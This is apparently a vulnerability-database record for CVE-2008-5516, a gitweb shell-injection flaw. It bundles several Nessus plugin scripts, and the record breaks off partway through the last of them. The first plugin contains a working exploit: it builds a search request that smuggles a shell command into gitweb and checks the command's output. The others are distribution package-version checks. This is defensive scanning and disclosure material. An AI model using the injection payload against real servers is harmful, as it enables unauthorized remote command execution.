ID CVE-2008-5516 Type cve Reporter cve@mitre.org Modified 2018-10-11T20:55:00
Description
The web interface in git (gitweb) 1.5.x before 1.5.5 allows remote attackers to execute arbitrary commands via shell metacharacters related to git_search.
{"nessus": [{"lastseen": "2019-02-21T01:14:44", "bulletinFamily": "scanner", "description": "The version of gitweb, a web-enabled interface to the open source distributed version control system Git, hosted on the remote web server fails to sanitize user-supplied input to the 'gitweb.cgi' script of shell metacharacters before passing it to a shell.\n\nAn unauthenticated, remote attacker can leverage this issue to execute arbitrary commands subject to the privileges under which the web server operates.", "modified": "2018-11-15T00:00:00", "id": "GITWEB_GIT_SEARCH_CMD_EXEC.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=53336", "published": "2011-04-08T00:00:00", "title": "GIT gitweb git_search Shell Metacharacter Arbitrary Command Execution", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif ( description )\n{\n script_id(53336);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/11/15 20:50:17\");\n\n script_cve_id(\"CVE-2008-5516\");\n script_bugtraq_id(33355);\n script_xref(name:\"Secunia\", value:\"33607\");\n\n script_name(english:\"GIT gitweb git_search Shell Metacharacter Arbitrary Command Execution\");\n script_summary(english:\"Tries to execute a command.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server contains a CGI script that can be abused to\nexecute arbitrary commands.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of gitweb, a web-enabled interface to the open source\ndistributed version control system Git, hosted on the remote web\nserver fails to sanitize user-supplied input to the 'gitweb.cgi'\nscript of shell metacharacters before passing it to a shell.\n\nAn unauthenticated, remote attacker can leverage this issue to execute\narbitrary commands subject to the privileges under which the web\nserver operates.\"\n );\n\n # https://repo.or.cz/w/git.git?a=commitdiff;h=c582abae46725504cee9ff91816c979989632f07\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f84acd89\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to version 1.5.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(78, 264);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/03/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:git:git\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"url_func.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"data_protection.inc\");\n\nglobal_var cgi, port;\n\nfunction exploit(cmd, regex, repo)\n{\n local_var matches, pattern, res, search, sha_commit, sha_file;\n local_var sha_null, url;\n\n # Get SHA-1 of HEAD.\n url = cgi + \"?p=\" + repo;\n res = http_send_recv3(\n port : port,\n method : \"GET\",\n item : url,\n exit_on_fail : TRUE\n );\n\n pattern = '<a href=\"[^\"]+\\\\?p=' + repo + ';a=commit;h=([a-z0-9]{40})\">commit</a>';\n matches = eregmatch(string:res[2], pattern:pattern);\n if ( isnull(matches) ) return NULL;\n sha_commit = matches[1];\n\n # Get SHA-1 of any file.\n url = cgi + \"?p=\" + repo + \";a=tree;hb=\" + sha_commit;\n res = http_send_recv3(\n port : port,\n method : \"GET\",\n item : url,\n exit_on_fail : TRUE\n );\n\n pattern = '<a href=\"[^\"]+\\\\?p=' + repo + ';a=blob;f=[^;]+;h=([a-z0-9]{40});hb=' + sha_commit + '\">blob</a>';\n matches = eregmatch(string:res[2], pattern:pattern);\n if ( isnull(matches) ) return NULL;\n sha_file = matches[1];\n\n # Exploit.\n sha_null = '0000000000000000000000000000000000000000';\n search = \"%27%27 | \";\n search += 'printf %22' + sha_commit + '\\\\n';\n search += '%3A000000 100644 ' + sha_null + ' ' + sha_file + ' A\\\\t%24%28' + cmd + '%29\\\\n';\n search += sha_null + '\\\\n%22%3B ';\n search += 'echo ' + SCRIPT_NAME + ' \\\\';\n\n search = str_replace(string:search, find:\" \", replace:\"+\");\n\n url = cgi + \"?p=\" + repo + \"&a=search&h=HEAD&st=pickaxe&s=\" + search;\n res = http_send_recv3(\n port : port,\n method : \"GET\",\n item : url,\n exit_on_fail : TRUE\n );\n\n pattern = '<span class=\"match\">(' + regex + ')</span>';\n matches = eregmatch(string:res[2], pattern:pattern);\n if ( isnull(matches) ) exit(0, \"The gitweb instance at \" + build_url(port:port, qs:cgi) + \" appears to be unaffected.\");\n\n return make_list(url, matches[1]);\n}\n\nport = get_http_port(default:80);\n\n# Loop through directories.\nif ( thorough_tests ) dirs = list_uniq(make_list(\"/gitweb\", \"/cgi-bin/gitweb\", \"/git\", \"/code\", cgi_dirs()));\nelse dirs = make_list(cgi_dirs());\n\n# Find the gitweb CGI.\nfound = FALSE;\nforeach dir ( dirs )\n{\n foreach ext ( make_list(\"cgi\", \"pl\", \"perl\") )\n {\n url = dir + \"/gitweb.\" + ext;\n res = http_send_recv3(\n port : port,\n method : \"GET\",\n item : url,\n exit_on_fail : TRUE\n );\n\n if (\n '<!-- git web interface version' >!< res[2] &&\n 'meta name=\"generator\" content=\"gitweb' >!< res[2]\n ) continue;\n\n cgi = url;\n found = TRUE;\n break;\n }\n\n if ( found ) break;\n}\nif ( ! found ) exit(0, \"The web server on port \" + port + \" does not appear to host gitweb.\");\n\n# Scrape repository names from page.\npattern = \"\\?p=([^;]+);a=\";\nlines = egrep(string:res[2], pattern:pattern);\nif ( isnull(lines) ) exit(1, \"Failed to find any repositories at \" + build_url(port:port, qs:cgi) + \".\");\n\n# Make a list of repositories.\nrepos = make_list();\nforeach line ( split(lines) )\n{\n matches = eregmatch(string:line, pattern:pattern);\n if ( isnull(matches) ) continue;\n\n repos = make_list(repos, matches[1]);\n}\nif ( max_index(repos) == 0 ) exit(1, \"Failed to parse repositories at \" + build_url(port:port, qs:cgi) + \".\");\n\n# Try to exploit each repo.\ncmd = \"id\";\nregex = \"uid=[0-9]+.*gid=[0-9]+.*\";\nresult = NULL;\nforeach repo ( list_uniq(repos) )\n{\n result = exploit(cmd:cmd, regex:regex, repo:repo);\n if ( ! isnull(result) ) break;\n}\nif ( isnull(result) ) exit(0, \"The gitweb instance at \" + build_url(port:port, qs:cgi) + \" appears to be unaffected.\");\n\n# Report our findings.\nif ( report_verbosity > 0 )\n{\n trailer = \"\";\n if ( report_verbosity > 1 )\n {\n trailer =\n '\\n' +\n 'The above URL caused gitweb to execute the command \\'' + cmd + '\\'\\n' +\n 'resulting in the following output :\\n' +\n '\\n ' + data_protection::sanitize_uid(output:result[1]) + '\\n';\n }\n\n report = get_vuln_report(trailer:trailer, items:result[0], port:port);\n\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-11-01T02:21:03", "bulletinFamily": "scanner", "description": "It was discovered that gitweb, the web interface for the Git version\ncontrol system, contained several vulnerabilities :\n\nRemote attackers could use crafted requests to execute shell commands\non the web server, using the snapshot generation and pickaxe search\nfunctionality (CVE-2008-5916 ).\n\nLocal users with write access to the configuration of a Git repository\nserved by gitweb could cause gitweb to execute arbitrary shell\ncommands with the permission of the web server (CVE-2008-5516,\nCVE-2008-5517 ).", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DSA-1708.NASL", "href": "https://www.tenable.com/plugins/nessus/35425", "published": "2009-01-20T00:00:00", "title": "Debian DSA-1708-1 : git-core - shell command injection", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1708. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35425);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/08/02 13:32:21\");\n\n script_cve_id(\"CVE-2008-5516\", \"CVE-2008-5517\", \"CVE-2008-5916\");\n script_xref(name:\"DSA\", value:\"1708\");\n\n script_name(english:\"Debian DSA-1708-1 : git-core - shell command injection\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that gitweb, the web interface for the Git version\ncontrol system, contained several vulnerabilities :\n\nRemote attackers could use crafted requests to execute shell commands\non the web server, using the snapshot generation and pickaxe search\nfunctionality (CVE-2008-5916 ).\n\nLocal users with write access to the configuration of a Git repository\nserved by gitweb could cause gitweb to execute arbitrary shell\ncommands with the permission of the web server (CVE-2008-5516,\nCVE-2008-5517 ).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=512330\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-5916\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-5516\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-5517\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-5516\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1708\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the Git packages.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 1.4.4.4-4+etch1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cwe_id(78, 94, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/01/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"git-arch\", reference:\"1.4.4.4-4+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"git-core\", reference:\"1.4.4.4-4+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"git-cvs\", reference:\"1.4.4.4-4+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"git-daemon-run\", reference:\"1.4.4.4-4+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"git-doc\", reference:\"1.4.4.4-4+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"git-email\", reference:\"1.4.4.4-4+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"git-svn\", reference:\"1.4.4.4-4+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"gitk\", reference:\"1.4.4.4-4+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"gitweb\", reference:\"1.4.4.4-4+etch1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:40:19", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-200903-15\n(git: Multiple vulnerabilties)\n\n Multiple vulnerabilities have been reported in gitweb that is part of\n the git package:\n Shell metacharacters related to git_search are not properly sanitized\n (CVE-2008-5516).\n Shell metacharacters related to git_snapshot and git_object are not\n properly sanitized (CVE-2008-5517).\n The diff.external configuration variable as set in a repository can be\n executed by gitweb (CVE-2008-5916).\n \nImpact :\n\n A remote unauthenticated attacker can execute arbitrary commands via\n shell metacharacters in a query, remote attackers with write access to\n a git repository configuration can execute arbitrary commands with the\n privileges of the user running gitweb by modifying the diff.external\n configuration variable in the repository and sending a crafted query to\n gitweb.\n \nWorkaround :\n\n There is no known workaround at this time.", "modified": "2019-11-02T00:00:00", "id": "GENTOO_GLSA-200903-15.NASL", "href": "https://www.tenable.com/plugins/nessus/35813", "published": "2009-03-10T00:00:00", "title": "GLSA-200903-15 : git: Multiple vulnerabilties", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200903-15.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35813);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/08/02 13:32:45\");\n\n script_cve_id(\"CVE-2008-5516\", \"CVE-2008-5517\", \"CVE-2008-5916\");\n script_bugtraq_id(32967, 33355);\n script_xref(name:\"GLSA\", value:\"200903-15\");\n\n script_name(english:\"GLSA-200903-15 : git: Multiple vulnerabilties\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200903-15\n(git: Multiple vulnerabilties)\n\n Multiple vulnerabilities have been reported in gitweb that is part of\n the git package:\n Shell metacharacters related to git_search are not properly sanitized\n (CVE-2008-5516).\n Shell metacharacters related to git_snapshot and git_object are not\n properly sanitized (CVE-2008-5517).\n The diff.external configuration variable as set in a repository can be\n executed by gitweb (CVE-2008-5916).\n \nImpact :\n\n A remote unauthenticated attacker can execute arbitrary commands via\n shell metacharacters in a query, remote attackers with write access to\n a git repository configuration can execute arbitrary commands with the\n privileges of the user running gitweb by modifying the diff.external\n configuration variable in the repository and sending a crafted query to\n gitweb.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200903-15\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All git users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-util/git-1.6.0.6'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(78, 94, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/03/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-util/git\", unaffected:make_list(\"ge 1.6.0.6\"), vulnerable:make_list(\"lt 1.6.0.6\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:10:46", "bulletinFamily": "scanner", "description": "New git packages are available for Slackware 12.0, 12.1, 12.2, and\n-current to fix security issues.", "modified": "2019-11-02T00:00:00", "id": "SLACKWARE_SSA_2009-051-02.NASL", "href": "https://www.tenable.com/plugins/nessus/35728", "published": "2009-02-23T00:00:00", "title": "Slackware 12.0 / 12.1 / 12.2 / current : git (SSA:2009-051-02)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2009-051-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35728);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/10/25 13:36:21\");\n\n script_cve_id(\"CVE-2008-3546\", \"CVE-2008-5516\", \"CVE-2008-5517\");\n script_xref(name:\"SSA\", value:\"2009-051-02\");\n\n script_name(english:\"Slackware 12.0 / 12.1 / 12.2 / current : git (SSA:2009-051-02)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New git packages are available for Slackware 12.0, 12.1, 12.2, and\n-current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.414289\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f639500e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected git package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cwe_id(78, 94, 119, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/02/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"12.0\", pkgname:\"git\", pkgver:\"1.6.1.3\", pkgarch:\"i486\", pkgnum:\"1_slack12.0\")) flag++;\n\nif (slackware_check(osver:\"12.1\", pkgname:\"git\", pkgver:\"1.6.1.3\", pkgarch:\"i486\", pkgnum:\"1_slack12.1\")) flag++;\n\nif (slackware_check(osver:\"12.2\", pkgname:\"git\", pkgver:\"1.6.1.3\", pkgarch:\"i486\", pkgnum:\"1_slack12.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"git\", pkgver:\"1.6.1.3\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-03T12:38:17", "bulletinFamily": "scanner", "description": "It was discovered that Git did not properly handle long file paths. If\na user were tricked into performing commands on a specially crafted\nGit repository, an attacker could possibly execute arbitrary code with\nthe privileges of the user invoking the program. (CVE-2008-3546)\n\nIt was discovered that the Git web interface (gitweb) did not\ncorrectly handle shell metacharacters when processing certain\ncommands. A remote attacker could send specially crafted commands to\nthe Git server and execute arbitrary code with the privileges of the\nGit web server. This issue only applied to Ubuntu 7.10 and 8.04 LTS.\n(CVE-2008-5516, CVE-2008-5517)\n\nIt was discovered that the Git web interface (gitweb) did not properly\nrestrict the diff.external configuration parameter. A local attacker\ncould exploit this issue and execute arbitrary code with the\nprivileges of the Git web server. This issue only applied to Ubuntu\n8.04 LTS and 8.10. (CVE-2008-5916).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "UBUNTU_USN-723-1.NASL", "href": "https://www.tenable.com/plugins/nessus/36720", "published": "2009-04-23T00:00:00", "title": "Ubuntu 6.06 LTS / 7.10 / 8.04 LTS / 8.10 : git-core vulnerabilities (USN-723-1)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-723-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(36720);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/08/02 13:33:02\");\n\n script_cve_id(\"CVE-2008-3546\", \"CVE-2008-5516\", \"CVE-2008-5517\", \"CVE-2008-5916\");\n script_bugtraq_id(32967, 33355);\n script_xref(name:\"USN\", value:\"723-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 7.10 / 8.04 LTS / 8.10 : git-core vulnerabilities (USN-723-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that Git did not properly handle long file paths. If\na user were tricked into performing commands on a specially crafted\nGit repository, an attacker could possibly execute arbitrary code with\nthe privileges of the user invoking the program. (CVE-2008-3546)\n\nIt was discovered that the Git web interface (gitweb) did not\ncorrectly handle shell metacharacters when processing certain\ncommands. A remote attacker could send specially crafted commands to\nthe Git server and execute arbitrary code with the privileges of the\nGit web server. This issue only applied to Ubuntu 7.10 and 8.04 LTS.\n(CVE-2008-5516, CVE-2008-5517)\n\nIt was discovered that the Git web interface (gitweb) did not properly\nrestrict the diff.external configuration parameter. A local attacker\ncould exploit this issue and execute arbitrary code with the\nprivileges of the Git web server. This issue only applied to Ubuntu\n8.04 LTS and 8.10. (CVE-2008-5916).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/723-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(78, 94, 119, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git-arch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git-daemon-run\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:gitweb\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2009-2019 Canonical, Inc. / NASL script (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(6\\.06|7\\.10|8\\.04|8\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 7.10 / 8.04 / 8.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) 